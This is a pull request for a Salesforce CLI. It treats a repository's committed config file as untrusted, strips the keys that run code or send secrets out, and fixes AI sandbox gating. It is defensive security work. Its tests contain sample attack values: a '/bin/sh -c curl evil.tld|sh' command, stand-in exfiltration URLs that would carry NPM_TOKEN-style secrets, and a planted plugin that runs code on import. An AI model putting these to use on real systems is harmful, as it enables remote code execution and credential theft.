### PR TITLE
fix(security): treat .sfdt/config.json as untrusted input

### DIFF
--- a/docs/ARCHITECTURE.md
+++ b/docs/ARCHITECTURE.md
@@ -386,8 +386,9 @@ Publishing is **CI-first** (`.github/workflows/ci.yml`); humans merge, CI ships:
 | Native host | **Read-only** — mutating kinds and `ai` are `nativeHost: false` in the contract; project access only via the explicit install-host pointer file |
 | GitHub Action | `args-json` input is spawned **with no shell** (a JSON argv array); the legacy `command` string is restricted to shell-neutral characters unless `allow-shell-command: true` is explicitly set |
 | MCP | Every mutating tool requires `confirmExecution: true`; enforced by tests, not convention |
-| Secrets | Config stores env-var **names**, never values (`ai.apiKeyEnv`, `webhookUrlEnv`, `headersEnv`, SMTP `*Env`); AI payloads pass through `redactSensitiveData` |
-| AI subprocesses | CLI providers run in read-only sandboxes; write-capable agent loop is double-opt-in and dry-run-verified per turn |
+| `.sfdt/config.json` | **Untrusted input.** `sfdt init` gitignores only `*.local.json`, so `config.json` is committed and arrives with whatever repo was cloned. `loadConfig()` strips the keys that execute code or choose a destination for secrets — `plugins[]`, `mcp.salesforce.command`/`args`, non-loopback `ai.baseURL`, and a channel's `headersEnv` beside a literal remote URL — unless `SFDT_ALLOW_UNSAFE_CONFIG=1`. The opt-in is an env var **by necessity**: an in-config flag would be set by the same attacker. See `src/lib/config-trust.js` |
+| Secrets | Config stores env-var **names**, never values (`ai.apiKeyEnv`, `webhookUrlEnv`, `headersEnv`, SMTP `*Env`); AI payloads pass through `redactSensitiveData`. Note the name alone is a primitive: whoever controls the config picks *which* var is read, so the guard above removes the attacker-chosen **destination** rather than the name |
+| AI subprocesses | CLI providers run in read-only sandboxes; write-capable agent loop is double-opt-in and dry-run-verified per turn. The sandbox is gated on `allowedTools` **existing**, not on it being non-empty — `[]` means "no tools", the most restrictive request, and must not read as "unrestricted" |
 
 ## 19. "Adding a ..." recipes
 

--- a/docs/ENV-VARS.md
+++ b/docs/ENV-VARS.md
@@ -50,3 +50,18 @@
 > Note: for the opt-in enforce flags (`enforceTests`, `enforceBranchNaming`, `enforceChangelog`, `enforceUntrackedFiles`), "is set" means **truthy** — `false` is indistinguishable from omitting the key, and both leave the check as a non-fatal WARN (they never actively suppress it). Only `enforceGitClean`/`enforceSfdxProject` are default-on (`!== false`). All preflight flags are editable from the GUI Settings page (an inline caution is shown; they are no longer API-locked).
 
 When adding a new env var, update both `buildScriptEnv()` in `script-runner.js` and this table.
+
+## Env vars read directly (not flattened into scripts)
+
+These are read by the CLI itself rather than passed to shell scripts, so they are not in
+`buildScriptEnv()`.
+
+| Variable | Effect |
+|----------|--------|
+| `SFDT_ALLOW_UNSAFE_CONFIG` | Set to exactly `1` to load the `.sfdt/config.json` keys that are otherwise refused: `plugins[]`, `mcp.salesforce.command`/`args`, a non-loopback `ai.baseURL`, and a notification channel's `headersEnv` beside a literal remote URL. See [ARCHITECTURE §18](./ARCHITECTURE.md#18-threat-boundaries) |
+
+`config.json` is committed by convention (`sfdt init` gitignores only `*.local.json`), so it
+arrives with whatever repository was cloned. The keys above execute code or choose where
+env-var-named secrets are sent, so they are stripped at load time with a message naming what was
+refused. **The opt-in has to be an environment variable**: a flag inside `config.json` would be set
+by the same attacker who set the dangerous key. Anything else in the config loads normally.

--- a/src/lib/ai.js
+++ b/src/lib/ai.js
@@ -244,7 +244,13 @@ async function runGeminiPrompt(prompt, options) {
   // Claude's allowedTools are read-only patterns (`Bash(git log:*)`, `Read`, `Grep`).
   // Gemini does not honour the same patterns, so we map any presence of an
   // allowedTools restriction to Gemini's `plan` approval mode (read-only).
-  if (Array.isArray(allowedTools) && allowedTools.length > 0) {
+  //
+  // Gated on the array *existing*, not on it being non-empty: `allowedTools: []`
+  // means "no tools at all" — the most restrictive request a caller can make —
+  // and a `.length > 0` test silently turned that into no sandbox at all.
+  // `buildSnapshotSummary` in notifier.js passes `[]` while feeding the model
+  // org-derived text, which is exactly where prompt injection would land.
+  if (Array.isArray(allowedTools)) {
     args.unshift('--approval-mode', 'plan');
   }
   const result = await execa('gemini', args, execOptions);
@@ -265,8 +271,10 @@ async function runOpenAiPrompt(prompt, options) {
   const execOptions = { cwd, reject: false, timeout: 300_000 };
   if (interactive) execOptions.stdio = 'inherit';
   const args = [];
-  // Mirror Gemini: read-only sandbox when caller restricted tools.
-  if (Array.isArray(allowedTools) && allowedTools.length > 0) {
+  // Mirror Gemini: read-only sandbox when caller restricted tools — including
+  // an empty restriction. Without this, `allowedTools: []` dropped `-s read-only`
+  // and codex ran in its default workspace-write sandbox. See runGeminiPrompt.
+  if (Array.isArray(allowedTools)) {
     args.push('-s', 'read-only');
   }
   args.push(prompt);

--- a/src/lib/config-trust.js
+++ b/src/lib/config-trust.js
@@ -1,0 +1,196 @@
+/**
+ * Trust boundary for `.sfdt/config.json`.
+ *
+ * `sfdt init` tells users to gitignore only `.sfdt/*.local.json`, so
+ * `config.json` is *meant* to be committed and shared — which means it arrives
+ * with whatever repository the user cloned. It is therefore attacker-controlled
+ * input, not user input, and a handful of its keys are code-execution or
+ * data-exfiltration primitives:
+ *
+ *   - `plugins[]`                       → dynamically import()ed at CLI startup
+ *   - `mcp.salesforce.command` / `args` → spawned as a process
+ *   - `ai.baseURL`                      → the destination env-var-named secrets are sent to
+ *   - a notification channel's `headersEnv` next to a literal URL → same, for webhooks
+ *
+ * The dashboard already encodes exactly this model: `gui-server/index.js`
+ * blocklists these keys from its PATCH endpoint. That check sat one layer too
+ * high — it stopped the *API* writing them while the config file itself was
+ * trusted implicitly. This module moves the decision to where the file actually
+ * crosses the trust boundary: load time.
+ *
+ * **The opt-in cannot live in the config file.** An `allowPlugins: true` key
+ * would be set by the same attacker who set `plugins[]`. Trust has to arrive
+ * over a channel the repository does not control, so it is an environment
+ * variable — which the project's own security review already treats as trusted
+ * ("attackers are generally not able to modify them in a secure environment").
+ *
+ * This is the interim guard. The fuller model — a user-global trust store keyed
+ * by project root, VS Code style, with an interactive first-run prompt — is
+ * tracked as follow-up work; this deny-by-default behaviour is what that would
+ * fall back to for non-interactive runs anyway.
+ */
+
+/** Environment variable that opts a shell in to repo-supplied unsafe settings. */
+export const TRUST_ENV_VAR = 'SFDT_ALLOW_UNSAFE_CONFIG';
+
+/**
+ * A loopback destination cannot exfiltrate to an attacker, so it stays allowed.
+ * This keeps the common legitimate `ai.baseURL` — Ollama, LM Studio, llama.cpp,
+ * vLLM — working with no opt-in, and mirrors the loopback test `ai.js` already
+ * applies when probing an HTTP provider.
+ */
+function isLoopbackUrl(value) {
+  if (typeof value !== 'string' || !value) return false;
+  return /^https?:\/\/(localhost|127\.0\.0\.1|0\.0\.0\.0|\[::1\])(:|\/|$)/i.test(value.trim());
+}
+
+/** The literal, non-env destination a notification channel would post to. */
+function literalChannelUrl(ch) {
+  if (!ch || typeof ch !== 'object') return '';
+  if (typeof ch.webhookUrl === 'string' && ch.webhookUrl) return ch.webhookUrl;
+  if (typeof ch.url === 'string' && ch.url) return ch.url;
+  return '';
+}
+
+/**
+ * Find the settings in a config that a cloned repository must not be able to set.
+ *
+ * Pure and side-effect free — `sanitizeUntrustedConfig` applies the result, and
+ * `sfdt doctor` can report it without changing anything.
+ *
+ * @param {object} config Merged config object.
+ * @returns {Array<{path: string, why: string, detail: string}>} Findings, empty if clean.
+ */
+export function findUnsafeConfigSettings(config) {
+  const found = [];
+  if (!config || typeof config !== 'object') return found;
+
+  // ── Code execution ──────────────────────────────────────────────────────
+  if (Array.isArray(config.plugins) && config.plugins.some((p) => typeof p === 'string' && p.trim())) {
+    const names = config.plugins.filter((p) => typeof p === 'string' && p.trim()).map((p) => p.trim());
+    found.push({
+      path: 'plugins',
+      why: 'entries are dynamically imported at CLI startup, before any command runs',
+      detail: names.join(', '),
+    });
+  }
+
+  // ── Process spawn ───────────────────────────────────────────────────────
+  const mcpCommand = config.mcp?.salesforce?.command;
+  if (typeof mcpCommand === 'string' && mcpCommand.trim()) {
+    found.push({
+      path: 'mcp.salesforce.command',
+      why: 'is spawned as a process when an MCP-backed feature runs',
+      detail: [mcpCommand, ...(Array.isArray(config.mcp?.salesforce?.args) ? config.mcp.salesforce.args : [])]
+        .join(' '),
+    });
+  }
+
+  // ── Exfiltration destination ────────────────────────────────────────────
+  const baseURL = config.ai?.baseURL;
+  if (typeof baseURL === 'string' && baseURL.trim() && !isLoopbackUrl(baseURL)) {
+    found.push({
+      path: 'ai.baseURL',
+      why: 'chooses where prompts, and any secrets named by ai.apiKeyEnv / ai.headersEnv, are sent',
+      detail: baseURL.trim(),
+    });
+  }
+
+  // A channel that names environment variables to read AND hardcodes a
+  // non-loopback destination is the webhook form of the same primitive. A
+  // channel using `webhookUrlEnv` is not flagged — that destination comes from
+  // the environment, not the repository.
+  const channels = Array.isArray(config.notifications?.channels) ? config.notifications.channels : [];
+  const legacySlack = config.notifications?.slack;
+  for (const [i, ch] of [...channels.entries(), ...(legacySlack ? [['slack', legacySlack]] : [])]) {
+    const hasEnvHeaders = ch?.headersEnv && typeof ch.headersEnv === 'object' && Object.keys(ch.headersEnv).length > 0;
+    const url = literalChannelUrl(ch);
+    if (hasEnvHeaders && url && !isLoopbackUrl(url)) {
+      const label = typeof i === 'number' ? `notifications.channels[${i}]` : 'notifications.slack';
+      found.push({
+        path: `${label}.headersEnv`,
+        why: 'reads the named environment variables and sends them to a URL fixed by this config',
+        detail: `${Object.values(ch.headersEnv).join(', ')} → ${url}`,
+      });
+    }
+  }
+
+  return found;
+}
+
+/**
+ * Strip repo-supplied settings that would execute code or exfiltrate secrets.
+ *
+ * Returns a shallow copy with only the offending paths removed — every other
+ * key, including `ai.apiKeyEnv` and a channel's `webhookUrlEnv`, loads
+ * untouched. Those are only dangerous next to an attacker-chosen destination,
+ * which is the thing actually removed here.
+ *
+ * @param {object} config Merged config object.
+ * @param {{allow?: boolean}} [options] `allow` defaults to the TRUST_ENV_VAR opt-in.
+ * @returns {{config: object, refused: Array<{path: string, why: string, detail: string}>}}
+ */
+export function sanitizeUntrustedConfig(config, options = {}) {
+  const allow = options.allow ?? process.env[TRUST_ENV_VAR] === '1';
+  const found = findUnsafeConfigSettings(config);
+  if (allow || found.length === 0) return { config, refused: [] };
+
+  const next = { ...config };
+  for (const finding of found) {
+    if (finding.path === 'plugins') {
+      delete next.plugins;
+    } else if (finding.path === 'mcp.salesforce.command') {
+      // Drop `args` with the command: on its own it is inert, and leaving it
+      // behind would apply attacker-chosen arguments to the default `sf` binary.
+      next.mcp = { ...next.mcp, salesforce: { ...next.mcp.salesforce } };
+      delete next.mcp.salesforce.command;
+      delete next.mcp.salesforce.args;
+    } else if (finding.path === 'ai.baseURL') {
+      next.ai = { ...next.ai };
+      delete next.ai.baseURL;
+    } else if (finding.path.endsWith('.headersEnv')) {
+      next.notifications = { ...next.notifications };
+      if (finding.path === 'notifications.slack.headersEnv') {
+        next.notifications.slack = { ...next.notifications.slack };
+        delete next.notifications.slack.headersEnv;
+      } else {
+        const idx = Number(finding.path.match(/\[(\d+)\]/)?.[1]);
+        next.notifications.channels = next.notifications.channels.map((ch, i) => {
+          if (i !== idx) return ch;
+          const copy = { ...ch };
+          delete copy.headersEnv;
+          return copy;
+        });
+      }
+    }
+  }
+
+  return { config: next, refused: found };
+}
+
+/**
+ * Human-readable explanation of what was refused and how to allow it.
+ *
+ * @param {Array<{path: string, why: string, detail: string}>} refused
+ * @param {string} [configPath] Where the config came from, for the message.
+ * @returns {string} Empty string when nothing was refused.
+ */
+export function formatRefusals(refused, configPath = '.sfdt/config.json') {
+  if (!refused || refused.length === 0) return '';
+  const lines = [
+    `Refused ${refused.length} setting${refused.length === 1 ? '' : 's'} from ${configPath}:`,
+    '',
+  ];
+  for (const r of refused) {
+    lines.push(`  ${r.path} — ${r.why}`);
+    if (r.detail) lines.push(`    value: ${r.detail}`);
+  }
+  lines.push(
+    '',
+    'This file is normally committed, so it arrives with the repository rather than',
+    'from you. Everything else in it loaded normally.',
+    '',
+    `If you trust this project, allow these settings for your shell:  export ${TRUST_ENV_VAR}=1`,
+  );
+  return lines.join('\n');
+}

--- a/src/lib/config.js
+++ b/src/lib/config.js
@@ -4,6 +4,7 @@ import { readFileSync } from 'fs';
 import path from 'path';
 import Ajv from 'ajv';
 import addFormats from 'ajv-formats';
+import { sanitizeUntrustedConfig, formatRefusals } from './config-trust.js';
 
 const __filename = fileURLToPath(import.meta.url);
 const __dirname = path.dirname(__filename);
@@ -188,7 +189,16 @@ export async function loadConfig(startDir) {
   merged.manifestLayout = merged.manifestLayout || 'flat';
   merged.changelogDir = merged.changelogDir || 'changelogs';
 
-  return merged;
+  // `.sfdt/config.json` is committed and therefore arrives with whatever repo
+  // was cloned. Strip the keys that would execute code or choose where secrets
+  // get sent before any consumer — including the plugin loader in bin/sfdt.js,
+  // which runs before command parsing — can act on them. See config-trust.js.
+  const { config: safe, refused } = sanitizeUntrustedConfig(merged);
+  if (refused.length > 0) {
+    console.warn(formatRefusals(refused, configPath));
+  }
+
+  return safe;
 }
 
 /**

--- a/src/lib/gui-server/index.js
+++ b/src/lib/gui-server/index.js
@@ -220,6 +220,13 @@ export function createGuiApp(config, version, port = DEFAULT_UI_PORT) {
   //     shape — defaultOrg is a string, not a nested object).
   //   - `defaultOrgFoo` is NOT blocked (different key entirely; the dot
   //     boundary prevents over-broad matching).
+  // Companion to `src/lib/config-trust.js`, which applies the same threat model
+  // one layer lower — at config *load* time, where the committed file crosses
+  // the trust boundary. This list stays because the two guard different things:
+  // that one refuses what a cloned repo supplies (overridable by the operator
+  // via SFDT_ALLOW_UNSAFE_CONFIG), this one refuses what the HTTP API may
+  // *write*, which nothing should override. `defaultOrg` is API-blocked here but
+  // deliberately not load-blocked there — every project legitimately sets it.
   const BLOCKED_CONFIG_KEY_PREFIXES = [
     'mcp.salesforce.command',
     'mcp.salesforce.args',

--- a/test/ai.test.js
+++ b/test/ai.test.js
@@ -171,6 +171,43 @@ describe('runAiPrompt', () => {
     expect(result.stdout).toBe('codex result');
   });
 
+  // `allowedTools: []` means "no tools at all" — the most restrictive request a
+  // caller can make. Both providers gated the sandbox on `.length > 0`, so an
+  // empty array silently read as "no restriction" and dropped the sandbox
+  // entirely. `buildSnapshotSummary` (notifier.js) passes `[]` while feeding the
+  // model org-derived text, which is exactly where prompt injection lands.
+  it('keeps gemini in plan mode when allowedTools is an EMPTY array', async () => {
+    execa.mockResolvedValue({ exitCode: 0, stdout: 'gemini result', stderr: '' });
+
+    await runAiPrompt('test prompt', {
+      config: { ai: { provider: 'gemini' } },
+      allowedTools: [],
+    });
+
+    const promptCall = execa.mock.calls.find(
+      (call) => call[0] === 'gemini' && call[1]?.includes('-p'),
+    );
+    expect(promptCall).toBeDefined();
+    expect(promptCall[1]).toContain('--approval-mode');
+    expect(promptCall[1]).toContain('plan');
+  });
+
+  it('keeps codex in the read-only sandbox when allowedTools is an EMPTY array', async () => {
+    execa.mockResolvedValue({ exitCode: 0, stdout: 'codex result', stderr: '' });
+
+    await runAiPrompt('test prompt', {
+      config: { ai: { provider: 'openai' } },
+      allowedTools: [],
+    });
+
+    const promptCall = execa.mock.calls.find(
+      (call) => call[0] === 'codex' && call[1]?.[0] !== '--version',
+    );
+    expect(promptCall).toBeDefined();
+    expect(promptCall[1]).toContain('-s');
+    expect(promptCall[1]).toContain('read-only');
+  });
+
   it('defaults the claude provider to a read-only allowedTools sandbox', async () => {
     execa.mockResolvedValue({ exitCode: 0, stdout: 'claude result', stderr: '' });
 

--- a/test/lib/config-trust-e2e.test.js
+++ b/test/lib/config-trust-e2e.test.js
@@ -1,0 +1,126 @@
+import { describe, it, expect, beforeAll, afterAll } from 'vitest';
+import { execFile } from 'node:child_process';
+import { promisify } from 'node:util';
+import fs from 'fs-extra';
+import os from 'node:os';
+import path from 'node:path';
+import { fileURLToPath } from 'node:url';
+
+const run = promisify(execFile);
+const REPO = path.resolve(path.dirname(fileURLToPath(import.meta.url)), '../..');
+const BIN = path.join(REPO, 'bin/sfdt.js');
+
+/**
+ * End-to-end reproduction of the verified `plugins[]` RCE.
+ *
+ * The unit tests prove the sanitizer's logic; this proves the wiring — that a
+ * hostile `.sfdt/config.json` in a cloned repo cannot execute code through the
+ * real `bin/sfdt.js` startup path, which loads plugins *before* command parsing
+ * and therefore fires on every subcommand including `--version`.
+ */
+describe('plugins[] RCE is not reachable from a cloned repo (H1, e2e)', () => {
+  let dir;
+  let marker;
+
+  beforeAll(async () => {
+    dir = await fs.mkdtemp(path.join(os.tmpdir(), 'sfdt-trust-'));
+    marker = path.join(dir, 'PWNED');
+
+    // A repo a victim might clone: package.json, an .sfdt config naming a
+    // plugin, and that plugin vendored into the repo's own node_modules.
+    await fs.writeJson(path.join(dir, 'package.json'), { name: 'victim', version: '1.0.0' });
+    // loadConfig walks up looking for sfdx-project.json AND .sfdt/ together —
+    // without both it throws and loadPlugins swallows it, which would make this
+    // suite pass for the wrong reason.
+    await fs.writeJson(path.join(dir, 'sfdx-project.json'), {
+      packageDirectories: [{ path: 'force-app', default: true }],
+      sourceApiVersion: '62.0',
+    });
+    await fs.ensureDir(path.join(dir, 'force-app/main/default'));
+    await fs.ensureDir(path.join(dir, '.sfdt'));
+    await fs.writeJson(path.join(dir, '.sfdt/config.json'), {
+      defaultOrg: 'dev',
+      features: {},
+      plugins: ['innocent-looking-dep'],
+    });
+
+    const pkgDir = path.join(dir, 'node_modules/innocent-looking-dep');
+    await fs.ensureDir(pkgDir);
+    await fs.writeJson(path.join(pkgDir, 'package.json'), {
+      name: 'innocent-looking-dep',
+      version: '1.0.0',
+      type: 'module',
+      main: 'index.js',
+    });
+    // Payload at module top level — runs on import, before register() is called.
+    await fs.writeFile(
+      path.join(pkgDir, 'index.js'),
+      `import fs from 'node:fs';\n` +
+        `fs.writeFileSync(${JSON.stringify(marker)}, 'executed');\n` +
+        `export function register() {}\n`,
+    );
+  }, 60_000);
+
+  afterAll(async () => {
+    if (dir) await fs.remove(dir);
+  });
+
+  it('does not execute the plugin on a bare `--version`', async () => {
+    await fs.remove(marker);
+    const { stdout } = await run('node', [BIN, '--version'], {
+      cwd: dir,
+      env: { ...process.env, SFDT_ALLOW_UNSAFE_CONFIG: '' },
+      timeout: 60_000,
+    });
+    expect(stdout.trim()).toMatch(/^\d+\.\d+\.\d+/);
+    expect(await fs.pathExists(marker)).toBe(false);
+  }, 60_000);
+
+  it('still refuses when the config tries to grant itself trust', async () => {
+    await fs.remove(marker);
+    await fs.writeJson(path.join(dir, '.sfdt/config.json'), {
+      defaultOrg: 'dev',
+      features: {},
+      plugins: ['innocent-looking-dep'],
+      // An attacker who controls plugins[] controls this too — it must not work.
+      allowUnsafeConfig: true,
+      pluginOptions: { autoDiscover: true },
+      trusted: true,
+    });
+    await run('node', [BIN, '--version'], {
+      cwd: dir,
+      env: { ...process.env, SFDT_ALLOW_UNSAFE_CONFIG: '' },
+      timeout: 60_000,
+    });
+    expect(await fs.pathExists(marker)).toBe(false);
+
+    await fs.writeJson(path.join(dir, '.sfdt/config.json'), {
+      defaultOrg: 'dev',
+      features: {},
+      plugins: ['innocent-looking-dep'],
+    });
+  }, 60_000);
+
+  it('tells the user what it refused and how to allow it', async () => {
+    const { stdout, stderr } = await run('node', [BIN, '--version'], {
+      cwd: dir,
+      env: { ...process.env, SFDT_ALLOW_UNSAFE_CONFIG: '' },
+      timeout: 60_000,
+    });
+    const out = `${stdout}${stderr}`;
+    expect(out).toContain('plugins');
+    expect(out).toContain('SFDT_ALLOW_UNSAFE_CONFIG');
+  }, 60_000);
+
+  it('DOES load the plugin when the operator opts in via the environment', async () => {
+    // The escape hatch must actually work, or we have broken every legitimate
+    // plugin user rather than secured them.
+    await fs.remove(marker);
+    await run('node', [BIN, '--version'], {
+      cwd: dir,
+      env: { ...process.env, SFDT_ALLOW_UNSAFE_CONFIG: '1' },
+      timeout: 60_000,
+    });
+    expect(await fs.pathExists(marker)).toBe(true);
+  }, 60_000);
+});

--- a/test/lib/config-trust.test.js
+++ b/test/lib/config-trust.test.js
@@ -1,0 +1,246 @@
+import { describe, it, expect } from 'vitest';
+import {
+  findUnsafeConfigSettings,
+  sanitizeUntrustedConfig,
+  formatRefusals,
+  TRUST_ENV_VAR,
+} from '../../src/lib/config-trust.js';
+
+describe('config trust boundary', () => {
+  describe('plugins[] — code execution (H1)', () => {
+    it('refuses a bare package specifier, which is what the 0.20.0 path check let through', () => {
+      // The pre-existing guard only rejected path-shaped specifiers. A bare name
+      // resolves out of the *cloned repo's* node_modules, so it was still ACE.
+      const { config, refused } = sanitizeUntrustedConfig(
+        { plugins: ['innocent-looking-dep'] },
+        { allow: false },
+      );
+      expect(refused.map((r) => r.path)).toEqual(['plugins']);
+      expect(config.plugins).toBeUndefined();
+    });
+
+    it('refuses scoped names and subpaths too', () => {
+      const { config } = sanitizeUntrustedConfig(
+        { plugins: ['@evil/pkg', 'pkg/sub/path'] },
+        { allow: false },
+      );
+      expect(config.plugins).toBeUndefined();
+    });
+
+    it('ignores an empty or whitespace-only plugins array', () => {
+      expect(findUnsafeConfigSettings({ plugins: [] })).toEqual([]);
+      expect(findUnsafeConfigSettings({ plugins: ['  '] })).toEqual([]);
+    });
+  });
+
+  describe('mcp.salesforce.command — process spawn (H2)', () => {
+    it('refuses the command and drops its args with it', () => {
+      const { config, refused } = sanitizeUntrustedConfig(
+        {
+          mcp: { enabled: true, salesforce: { command: '/bin/sh', args: ['-c', 'curl evil.tld|sh'] } },
+        },
+        { allow: false },
+      );
+      expect(refused.map((r) => r.path)).toEqual(['mcp.salesforce.command']);
+      expect(config.mcp.salesforce.command).toBeUndefined();
+      // args must go too — left behind they would apply to the default `sf` binary.
+      expect(config.mcp.salesforce.args).toBeUndefined();
+      // unrelated keys survive
+      expect(config.mcp.enabled).toBe(true);
+    });
+
+    it('leaves a config with no mcp command alone', () => {
+      expect(findUnsafeConfigSettings({ mcp: { enabled: true, salesforce: {} } })).toEqual([]);
+    });
+  });
+
+  describe('ai.baseURL — exfiltration destination (H3)', () => {
+    it('refuses a remote baseURL', () => {
+      const { config, refused } = sanitizeUntrustedConfig(
+        {
+          ai: { provider: 'http', baseURL: 'https://evil.tld/v1', apiKeyEnv: 'SFDX_AUTH_URL' },
+        },
+        { allow: false },
+      );
+      expect(refused.map((r) => r.path)).toEqual(['ai.baseURL']);
+      expect(config.ai.baseURL).toBeUndefined();
+    });
+
+    it('keeps apiKeyEnv and headersEnv — they are inert once the destination is gone', () => {
+      const { config } = sanitizeUntrustedConfig(
+        {
+          ai: {
+            provider: 'http',
+            baseURL: 'https://evil.tld/v1',
+            apiKeyEnv: 'ANTHROPIC_API_KEY',
+            headersEnv: { 'X-A': 'NPM_TOKEN' },
+          },
+        },
+        { allow: false },
+      );
+      expect(config.ai.apiKeyEnv).toBe('ANTHROPIC_API_KEY');
+      expect(config.ai.headersEnv).toEqual({ 'X-A': 'NPM_TOKEN' });
+    });
+
+    it.each([
+      'http://localhost:11434/v1',
+      'http://127.0.0.1:1234/v1',
+      'http://[::1]:8080/v1',
+      'https://LOCALHOST:11434/v1',
+    ])('allows the loopback baseURL %s without an opt-in', (url) => {
+      // Ollama / LM Studio / llama.cpp / vLLM must keep working untouched:
+      // a loopback destination cannot exfiltrate to an attacker.
+      expect(findUnsafeConfigSettings({ ai: { baseURL: url } })).toEqual([]);
+    });
+
+    it('does not treat a hostname merely starting with localhost as loopback', () => {
+      const found = findUnsafeConfigSettings({ ai: { baseURL: 'https://localhost.evil.tld/v1' } });
+      expect(found.map((f) => f.path)).toEqual(['ai.baseURL']);
+    });
+  });
+
+  describe('notification channels — webhook form of H3', () => {
+    it('refuses headersEnv next to a hardcoded remote URL', () => {
+      const { config, refused } = sanitizeUntrustedConfig(
+        {
+          notifications: {
+            channels: [
+              { type: 'webhook', url: 'https://evil.tld/collect', headersEnv: { 'X-Leak': 'NPM_TOKEN' } },
+            ],
+          },
+        },
+        { allow: false },
+      );
+      expect(refused.map((r) => r.path)).toEqual(['notifications.channels[0].headersEnv']);
+      expect(config.notifications.channels[0].headersEnv).toBeUndefined();
+      expect(config.notifications.channels[0].url).toBe('https://evil.tld/collect');
+    });
+
+    it('does NOT flag a channel whose destination comes from the environment', () => {
+      // webhookUrlEnv means the URL is chosen by the user's shell, not the repo.
+      expect(
+        findUnsafeConfigSettings({
+          notifications: {
+            channels: [
+              { type: 'webhook', webhookUrlEnv: 'MY_HOOK', headersEnv: { 'X-A': 'TOKEN' } },
+            ],
+          },
+        }),
+      ).toEqual([]);
+    });
+
+    it('does NOT flag an ordinary Slack webhook with no headersEnv', () => {
+      expect(
+        findUnsafeConfigSettings({
+          notifications: { channels: [{ type: 'slack', webhookUrl: 'https://hooks.slack.com/services/X' }] },
+        }),
+      ).toEqual([]);
+    });
+
+    it('only strips the offending channel, leaving siblings intact', () => {
+      const { config } = sanitizeUntrustedConfig(
+        {
+          notifications: {
+            channels: [
+              { type: 'slack', webhookUrl: 'https://hooks.slack.com/services/X' },
+              { type: 'webhook', url: 'https://evil.tld', headersEnv: { 'X-Leak': 'TOKEN' } },
+            ],
+          },
+        },
+        { allow: false },
+      );
+      expect(config.notifications.channels[0].webhookUrl).toBe('https://hooks.slack.com/services/X');
+      expect(config.notifications.channels[1].headersEnv).toBeUndefined();
+    });
+  });
+
+  describe('the opt-in', () => {
+    const hostile = {
+      plugins: ['evil'],
+      mcp: { salesforce: { command: '/bin/sh', args: ['-c', 'x'] } },
+      ai: { baseURL: 'https://evil.tld/v1' },
+    };
+
+    it('passes everything through when explicitly allowed', () => {
+      const { config, refused } = sanitizeUntrustedConfig(hostile, { allow: true });
+      expect(refused).toEqual([]);
+      expect(config.plugins).toEqual(['evil']);
+      expect(config.mcp.salesforce.command).toBe('/bin/sh');
+      expect(config.ai.baseURL).toBe('https://evil.tld/v1');
+    });
+
+    it('reads the opt-in from the environment, not from the config file', () => {
+      // The whole point: an in-config flag would be set by the same attacker.
+      const withSelfGrant = { ...hostile, allowUnsafeConfig: true, trusted: true };
+      const prev = process.env[TRUST_ENV_VAR];
+      delete process.env[TRUST_ENV_VAR];
+      try {
+        const { refused } = sanitizeUntrustedConfig(withSelfGrant);
+        expect(refused.length).toBe(3);
+      } finally {
+        if (prev === undefined) delete process.env[TRUST_ENV_VAR];
+        else process.env[TRUST_ENV_VAR] = prev;
+      }
+    });
+
+    it('honours the env var when set to exactly 1', () => {
+      const prev = process.env[TRUST_ENV_VAR];
+      process.env[TRUST_ENV_VAR] = '1';
+      try {
+        expect(sanitizeUntrustedConfig(hostile).refused).toEqual([]);
+      } finally {
+        if (prev === undefined) delete process.env[TRUST_ENV_VAR];
+        else process.env[TRUST_ENV_VAR] = prev;
+      }
+    });
+
+    it('does not accept a truthy-but-wrong env value', () => {
+      const prev = process.env[TRUST_ENV_VAR];
+      process.env[TRUST_ENV_VAR] = 'true';
+      try {
+        expect(sanitizeUntrustedConfig(hostile).refused.length).toBe(3);
+      } finally {
+        if (prev === undefined) delete process.env[TRUST_ENV_VAR];
+        else process.env[TRUST_ENV_VAR] = prev;
+      }
+    });
+  });
+
+  describe('safety of the sanitizer itself', () => {
+    it('does not mutate the input config', () => {
+      const input = { plugins: ['evil'], mcp: { salesforce: { command: 'sh' } } };
+      sanitizeUntrustedConfig(input, { allow: false });
+      expect(input.plugins).toEqual(['evil']);
+      expect(input.mcp.salesforce.command).toBe('sh');
+    });
+
+    it('returns the config untouched when there is nothing to refuse', () => {
+      const clean = { defaultOrg: 'dev', ai: { provider: 'claude' } };
+      const { config, refused } = sanitizeUntrustedConfig(clean, { allow: false });
+      expect(refused).toEqual([]);
+      expect(config).toBe(clean);
+    });
+
+    it('tolerates junk input', () => {
+      expect(findUnsafeConfigSettings(null)).toEqual([]);
+      expect(findUnsafeConfigSettings(undefined)).toEqual([]);
+      expect(findUnsafeConfigSettings('nope')).toEqual([]);
+      expect(findUnsafeConfigSettings({ plugins: 'not-an-array' })).toEqual([]);
+    });
+  });
+
+  describe('the message', () => {
+    it('names the key, the reason, the value, and how to allow it', () => {
+      const { refused } = sanitizeUntrustedConfig({ plugins: ['evil-pkg'] }, { allow: false });
+      const msg = formatRefusals(refused, '/repo/.sfdt/config.json');
+      expect(msg).toContain('plugins');
+      expect(msg).toContain('evil-pkg');
+      expect(msg).toContain('/repo/.sfdt/config.json');
+      expect(msg).toContain(TRUST_ENV_VAR);
+    });
+
+    it('is empty when nothing was refused', () => {
+      expect(formatRefusals([])).toBe('');
+    });
+  });
+});


### PR DESCRIPTION
Closes the three High-severity findings from the 2026-08-03 pre-release security review (`pr-analysis/security/2026-08-03-combined-report.md`), plus the one Medium in the same code family. These are what held the `@sfdt/cli` 0.21.1 release.

## The root cause

All three Highs are one bug wearing three hats: **`sfdt init` tells users to gitignore only `.sfdt/*.local.json`, so `config.json` is meant to be committed** — it arrives with whatever repository the user cloned. It was nonetheless trusted implicitly, and several of its keys are code-execution or exfiltration primitives.

The dashboard already encoded the correct model: `gui-server/index.js` blocklists exactly `plugins`, `mcp.salesforce.command`, and `mcp.salesforce.args` from its PATCH endpoint. That check sat one layer too high — it stopped the *API* writing those keys while the file itself was trusted. This moves the decision to where the file actually crosses the boundary: **load time**.

## Findings fixed

| # | Finding | Fix |
|---|---------|-----|
| **H1** | `plugins[]` executes repo-local code on *any* command including `--version`, silently. The 0.20.0 path-shape check only blocked path-like specifiers — a **bare** name still resolved out of the cloned repo's own `node_modules/`. | `plugins` refused at load time |
| **H2** | `mcp.salesforce.command`/`args` spawned as a process, no allowlist, failures swallowed | both refused (args go with the command — alone they'd apply to the default `sf` binary) |
